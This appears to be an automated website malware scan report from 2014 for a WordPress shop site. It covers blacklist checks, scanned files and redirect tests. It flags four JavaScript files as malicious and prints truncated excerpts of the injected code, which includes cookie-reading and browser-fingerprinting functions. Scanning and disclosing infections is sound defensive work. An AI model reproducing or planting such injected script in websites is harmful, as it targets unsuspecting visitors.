Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=parawanik.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://parawanik.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.parawanik.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 16 Sep 2014 00:21:37 GMT Pragma: no-cache Location: http://parawanik.com/ Server: Apache/2 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.parawanik.com Set-Cookie: PHPSESSID=2b070c94e875491d19d0c8be17b90e43; path=/ Set-Cookie: wpsc_customer_cookie_ff9144d6751c4cff74482984f04efd49=_vbPjzdoJ%25moO%7C1410999696%7C8a9a5bb755f55f0163519b6b1515af50; expires=Thu, 18-Sep-2014 00:21:36 GMT; path=/; httponly X-Pingback: http://parawanik.com/xmlrpc.php | clean |
http://parawanik.com/ | 200 OK Content-Length: 25712 Content-Type: text/html | clean |
http://parawanik.com/wp-content/themes/fall_school_starts_ote085/script.js | 200 OK Content-Length: 7459 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - if (this.A) this.A.className += " artmenuhoverA"; }; oLI.onmouseleave = function() { this.className = this.className.replace(/menuhover/,""); this.UL.className = this.UL.className.replace(/menuhoverUL/,""); if (this.A) this.A.className = this.A.className.replace(/menuhoverA/,""); }; } } } } artLoadEvent.add(Menu_IE6Setup); Antivirus reports:
| ||
http://parawanik.com/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 94993 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - Antivirus reports:
| ||
http://parawanik.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/wp-e-commerce.js?ver=3.8.9.5.649230 | 200 OK Content-Length: 30065 Content-Type: application/javascript | clean |
http://parawanik.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/jquery.infieldlabel.min.js?ver=3.8.9.5.649230 | 200 OK Content-Length: 1787 Content-Type: application/javascript | clean |
http://parawanik.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/ajax.js?ver=3.8.9.5.649230 | 200 OK Content-Length: 2693 Content-Type: application/javascript | clean |
http://parawanik.com/index.php?wpsc_user_dynamic_js=true&ver=3.8.9.5.649230 | 200 OK Content-Length: 982 Content-Type: text/javascript | clean |
http://parawanik.com/wp-content/plugins/wp-e-commerce/wpsc-admin/js/jquery.livequery.js?ver=1.0.3 | 200 OK Content-Length: 6714 Content-Type: application/javascript | clean |
http://parawanik.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/user.js?ver=3.8.9.5649230 | 200 OK Content-Length: 14672 Content-Type: application/javascript | clean |
http://parawanik.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/thickbox.js?ver=Instinct_e-commerce | 200 OK Content-Length: 14444 Content-Type: application/javascript | clean |
http://parawanik.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995 | 200 OK Content-Length: 26590 Content-Type: application/javascript | clean |
http://parawanik.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.05 | 200 OK Content-Length: 1750 Content-Type: application/javascript | clean |
http://parawanik.com/wp-content/plugins/social-gallery-lite/js/socialGalleryPluginLite.js | 200 OK Content-Length: 16231 Content-Type: application/javascript | clean |
http://parawanik.com/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 29500 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - } this.selected = select; } }); }; $.fn.ajaxSubmit.debug = false; function log() { if (!$.fn.ajaxSubmit.debug) return; var msg = '[jquery.form] ' + Array.prototype.join.call(arguments,''); if (window.console && window.console.log) { window.console.log(msg); } else if (window.opera && window.opera.postError) { window.opera.postError(msg); } }; })(jQuery); Antivirus reports:
| ||
http://parawanik.com/wp-content/plugins/contact-form-7/scripts.js?ver=3.1 | 200 OK Content-Length: 7312 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - $(this).find('span.wpcf7-not-valid-tip').remove(); $(this).find('img.ajax-loader').css({ visibility: 'hidden' }); }); }; $.fn.wpcf7FillResponseOutput = function(message) { return this.each(function() { $(this).find('div.wpcf7-response-output').append(message).slideDown('fast'); }); }; })(jQuery); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: parawanik.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 16 Sep 2014 00:21:39 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=parawanik.com
Set-Cookie: PHPSESSID=6918cc63aaa9837a4a0a70ab724bce9d; path=/
Set-Cookie: wpsc_customer_cookie_ff9144d6751c4cff74482984f04efd49=_U%29B2l%29bsMkNe%7C1410999698%7C23d4244c60128d44c5f2c565f96cc447; expires=Thu, 18-Sep-2014 00:21:38 GMT; path=/; httponly
X-Pingback: http://parawanik.com/xmlrpc.php
GET / HTTP/1.1
Host: parawanik.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 16 Sep 2014 00:21:39 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=parawanik.com
Set-Cookie: PHPSESSID=6918cc63aaa9837a4a0a70ab724bce9d; path=/
Set-Cookie: wpsc_customer_cookie_ff9144d6751c4cff74482984f04efd49=_U%29B2l%29bsMkNe%7C1410999698%7C23d4244c60128d44c5f2c565f96cc447; expires=Thu, 18-Sep-2014 00:21:38 GMT; path=/; httponly
X-Pingback: http://parawanik.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: parawanik.com
Referer: http://www.google.com/search?q=parawanik.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: parawanik.com
Referer: http://www.google.com/search?q=parawanik.com
Result:
The result is similar to the first query. There are no suspicious redirects found.